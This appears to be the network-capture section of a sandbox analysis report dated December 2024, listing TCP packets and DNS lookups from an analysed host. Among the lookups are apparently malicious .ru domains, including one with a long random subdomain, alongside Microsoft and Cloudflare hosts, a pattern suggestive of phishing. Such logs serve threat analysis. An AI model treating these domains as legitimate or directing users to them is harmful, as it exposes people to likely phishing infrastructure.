                                                  Dec 9, 2024 09:35:41.561413050 CET49839443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:41.561419010 CET4434983913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:41.661876917 CET44349818142.250.181.68192.168.2.4
                                                  Dec 9, 2024 09:35:41.661936045 CET44349818142.250.181.68192.168.2.4
                                                  Dec 9, 2024 09:35:41.661990881 CET49818443192.168.2.4142.250.181.68
                                                  Dec 9, 2024 09:35:42.024821997 CET4434983913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.024888039 CET4434983913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.024970055 CET49839443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.025214911 CET49839443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.025229931 CET4434983913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.025238991 CET49839443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.025243998 CET4434983913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.027776957 CET49844443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.027791977 CET4434984413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.027877092 CET49844443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.028007030 CET49844443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.028019905 CET4434984413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.109148026 CET49818443192.168.2.4142.250.181.68
                                                  Dec 9, 2024 09:35:42.109170914 CET44349818142.250.181.68192.168.2.4
                                                  Dec 9, 2024 09:35:42.420142889 CET4434984013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.420641899 CET49840443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.420659065 CET4434984013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.421117067 CET49840443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.421122074 CET4434984013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.433545113 CET4434984113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.433876038 CET49841443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.433898926 CET4434984113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.434298992 CET49841443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.434303045 CET4434984113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.626202106 CET4434984313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.626574039 CET49843443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.626585960 CET4434984313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.626956940 CET49843443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.626960993 CET4434984313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.658935070 CET4434984213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.663336039 CET49842443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.663348913 CET4434984213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.663691998 CET49842443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.663697004 CET4434984213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.854166985 CET4434984013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.854207039 CET4434984013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.854266882 CET49840443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.854471922 CET49840443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.854485035 CET4434984013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.854494095 CET49840443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.854499102 CET4434984013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.857345104 CET49845443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.857383966 CET4434984513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.857456923 CET49845443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.857584953 CET49845443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.857595921 CET4434984513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.868268967 CET4434984113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.868328094 CET4434984113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.868374109 CET49841443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.868449926 CET49841443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.868449926 CET49841443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.868463993 CET4434984113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.868470907 CET4434984113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.870481968 CET49846443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.870507956 CET4434984613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:42.870579958 CET49846443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.870709896 CET49846443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:42.870723009 CET4434984613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.060094118 CET4434984313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.060144901 CET4434984313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.060266972 CET49843443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.060501099 CET49843443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.060512066 CET4434984313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.060519934 CET49843443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.060523987 CET4434984313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.063011885 CET49847443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.063034058 CET4434984713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.063111067 CET49847443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.063278913 CET49847443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.063290119 CET4434984713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.094016075 CET4434984213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.094067097 CET4434984213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.094108105 CET49842443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.094244957 CET49842443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.094250917 CET4434984213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.094260931 CET49842443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.094264984 CET4434984213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.096147060 CET49848443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.096177101 CET4434984813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.096259117 CET49848443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.096374989 CET49848443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.096386909 CET4434984813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.742173910 CET4434984413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.742713928 CET49844443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.742733002 CET4434984413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:43.743128061 CET49844443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:43.743135929 CET4434984413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.175530910 CET4434984413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.175589085 CET4434984413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.175645113 CET49844443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.175832033 CET49844443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.175844908 CET4434984413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.175853968 CET49844443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.175858974 CET4434984413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.178556919 CET49849443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.178582907 CET4434984913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.178659916 CET49849443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.178814888 CET49849443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.178828955 CET4434984913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.573021889 CET4434984513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.573482990 CET49845443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.573508978 CET4434984513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.573918104 CET49845443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.573924065 CET4434984513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.597395897 CET4434984613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.598341942 CET49846443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.598356962 CET4434984613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.598722935 CET49846443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.598728895 CET4434984613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.776581049 CET4434984713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.776954889 CET49847443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.776962996 CET4434984713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.777605057 CET49847443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.777609110 CET4434984713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.820303917 CET4434984813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.820576906 CET49848443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.820600986 CET4434984813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:44.820941925 CET49848443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:44.820949078 CET4434984813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.007448912 CET4434984513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.007514000 CET4434984513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.007711887 CET49845443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.009310007 CET49845443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.009310007 CET49845443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.009327888 CET4434984513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.009337902 CET4434984513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.018697977 CET49850443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.018727064 CET4434985013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.018793106 CET49850443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.019166946 CET49850443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.019181967 CET4434985013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.030772924 CET4434984613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.030831099 CET4434984613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.030874968 CET49846443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.035696983 CET49846443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.035710096 CET4434984613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.039504051 CET49851443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.039535046 CET4434985113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.039587021 CET49851443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.043137074 CET49851443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.043152094 CET4434985113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.210355997 CET4434984713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.210410118 CET4434984713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.210455894 CET49847443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.210568905 CET49847443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.210568905 CET49847443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.210585117 CET4434984713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.210592985 CET4434984713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.212610006 CET49852443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.212641954 CET4434985213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.212699890 CET49852443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.212867022 CET49852443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.212882042 CET4434985213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.262444019 CET4434984813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.262501001 CET4434984813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.262564898 CET49848443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.262677908 CET49848443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.262677908 CET49848443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.262691021 CET4434984813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.262700081 CET4434984813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.264831066 CET49853443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.264863968 CET4434985313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.264976978 CET49853443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.265166044 CET49853443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.265178919 CET4434985313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.726407051 CET4434984913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.726897955 CET49849443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.726917028 CET4434984913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:45.727458000 CET49849443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:45.727463961 CET4434984913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:46.198936939 CET4434984913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:46.198983908 CET4434984913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:46.199050903 CET49849443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:46.199296951 CET49849443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:46.199316978 CET4434984913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:46.199331999 CET49849443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:46.199337959 CET4434984913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:46.202301979 CET49854443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:46.202341080 CET4434985413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:46.202418089 CET49854443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:46.202585936 CET49854443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:46.202599049 CET4434985413.107.246.63192.168.2.4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 9, 2024 09:34:25.900719881 CET53598231.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:26.066272974 CET53501891.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:28.722563028 CET53572621.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:30.201984882 CET5505753192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:30.202124119 CET5053153192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:30.339167118 CET53505311.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:30.339281082 CET53550571.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:31.443319082 CET5171353192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:31.444101095 CET6009953192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:32.075378895 CET53517131.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:32.076587915 CET53600991.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:33.686753035 CET5851053192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:33.686948061 CET6211153192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:34.190083027 CET53621111.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:34.191174984 CET53585101.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:37.602566004 CET5277853192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:37.602750063 CET6383053192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:37.603522062 CET5799953192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:37.603758097 CET5856953192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:37.604326963 CET5565353192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:37.604465961 CET6370453192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:37.739851952 CET53638301.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:37.739866018 CET53579991.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:37.739872932 CET53527781.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:37.740408897 CET53585691.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:37.740736008 CET53637041.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:37.740752935 CET53556531.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:39.868000031 CET5981053192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:39.868261099 CET5841653192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:39.910639048 CET5423553192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:39.910990000 CET5128853192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:40.005376101 CET53598101.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:40.006458044 CET53584161.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:40.047485113 CET53542351.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:40.047732115 CET53512881.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:41.460426092 CET5131653192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:41.460572958 CET5401853192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:41.493556976 CET5043453192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:41.493593931 CET5616753192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:41.597251892 CET53540181.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:41.597263098 CET53513161.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:41.630233049 CET53561671.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:41.631063938 CET53504341.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:44.010279894 CET138138192.168.2.4192.168.2.255
                                                  Dec 9, 2024 09:34:45.714900970 CET53591061.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:48.968487978 CET5768153192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:48.968671083 CET6245353192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:34:49.105416059 CET53624531.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:34:49.105427027 CET53576811.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:35:04.725394964 CET53652961.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:35:06.316143990 CET6514553192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:06.316207886 CET4917853192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:06.708965063 CET53491781.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:35:06.710834026 CET53651451.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:35:10.053847075 CET5442453192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:10.053972006 CET5729953192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:10.192611933 CET53544241.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:35:10.192656994 CET53572991.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:35:17.602812052 CET5289553192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:17.602899075 CET5011653192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:17.604729891 CET6142653192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:17.604868889 CET5773453192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:20.351423025 CET5110053192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:20.351563931 CET6472353192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:20.967242002 CET6068353192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:20.967382908 CET6456753192.168.2.41.1.1.1
                                                  Dec 9, 2024 09:35:25.700364113 CET53554771.1.1.1192.168.2.4
                                                  Dec 9, 2024 09:35:27.605653048 CET53538331.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPChecksumCodeType
                                                  Dec 9, 2024 09:35:13.543715954 CET192.168.2.41.1.1.1c2ea(Port unreachable)Destination Unreachable
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 9, 2024 09:34:30.201984882 CET192.168.2.41.1.1.10x9a37Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:30.202124119 CET192.168.2.41.1.1.10x8b46Standard query (0)www.google.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:31.443319082 CET192.168.2.41.1.1.10xa41aStandard query (0)www.pixelpromo.ruA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:31.444101095 CET192.168.2.41.1.1.10xa54Standard query (0)www.pixelpromo.ru65IN (0x0001)false
                                                  Dec 9, 2024 09:34:33.686753035 CET192.168.2.41.1.1.10x3442Standard query (0)or.smelsgycz.ruA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:33.686948061 CET192.168.2.41.1.1.10x5bd4Standard query (0)or.smelsgycz.ru65IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.602566004 CET192.168.2.41.1.1.10xd0c0Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.602750063 CET192.168.2.41.1.1.10x9cb1Standard query (0)code.jquery.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.603522062 CET192.168.2.41.1.1.10x6fddStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.603758097 CET192.168.2.41.1.1.10xfd69Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.604326963 CET192.168.2.41.1.1.10x29e3Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.604465961 CET192.168.2.41.1.1.10x5bbcStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:39.868000031 CET192.168.2.41.1.1.10x5caeStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:39.868261099 CET192.168.2.41.1.1.10xd109Standard query (0)code.jquery.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:39.910639048 CET192.168.2.41.1.1.10x8786Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:39.910990000 CET192.168.2.41.1.1.10xe766Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.460426092 CET192.168.2.41.1.1.10x5b82Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.460572958 CET192.168.2.41.1.1.10x7ec1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.493556976 CET192.168.2.41.1.1.10x700dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:41.493593931 CET192.168.2.41.1.1.10x9fadStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:48.968487978 CET192.168.2.41.1.1.10x6008Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:48.968671083 CET192.168.2.41.1.1.10xfa43Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                  Dec 9, 2024 09:35:06.316143990 CET192.168.2.41.1.1.10x57cbStandard query (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ruA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:06.316207886 CET192.168.2.41.1.1.10x2fc4Standard query (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru65IN (0x0001)false
                                                  Dec 9, 2024 09:35:10.053847075 CET192.168.2.41.1.1.10x95dcStandard query (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ruA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:10.053972006 CET192.168.2.41.1.1.10x9deeStandard query (0)cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru65IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.602812052 CET192.168.2.41.1.1.10x4e64Standard query (0)cdn.graph.office.netA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.602899075 CET192.168.2.41.1.1.10x4db3Standard query (0)cdn.graph.office.net65IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.604729891 CET192.168.2.41.1.1.10x62d8Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:17.604868889 CET192.168.2.41.1.1.10x5b91Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                  Dec 9, 2024 09:35:20.351423025 CET192.168.2.41.1.1.10x7b4dStandard query (0)cdn.graph.office.netA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:20.351563931 CET192.168.2.41.1.1.10x6a37Standard query (0)cdn.graph.office.net65IN (0x0001)false
                                                  Dec 9, 2024 09:35:20.967242002 CET192.168.2.41.1.1.10xc783Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:35:20.967382908 CET192.168.2.41.1.1.10x8f6aStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 9, 2024 09:34:30.339167118 CET1.1.1.1192.168.2.40x8b46No error (0)www.google.com65IN (0x0001)false
                                                  Dec 9, 2024 09:34:30.339281082 CET1.1.1.1192.168.2.40x9a37No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:32.075378895 CET1.1.1.1192.168.2.40xa41aNo error (0)www.pixelpromo.rupixelpromo.ruCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:34:32.075378895 CET1.1.1.1192.168.2.40xa41aNo error (0)pixelpromo.ru93.188.41.36A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:32.076587915 CET1.1.1.1192.168.2.40xa54No error (0)www.pixelpromo.rupixelpromo.ruCNAME (Canonical name)IN (0x0001)false
                                                  Dec 9, 2024 09:34:34.190083027 CET1.1.1.1192.168.2.40x5bd4No error (0)or.smelsgycz.ru65IN (0x0001)false
                                                  Dec 9, 2024 09:34:34.191174984 CET1.1.1.1192.168.2.40x3442No error (0)or.smelsgycz.ru172.67.139.29A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:34.191174984 CET1.1.1.1192.168.2.40x3442No error (0)or.smelsgycz.ru104.21.87.7A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.739866018 CET1.1.1.1192.168.2.40x6fddNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.739866018 CET1.1.1.1192.168.2.40x6fddNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.739872932 CET1.1.1.1192.168.2.40xd0c0No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                  Dec 9, 2024 09:34:37.739872932 CET1.1.1.1192.168.2.40xd0c0No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
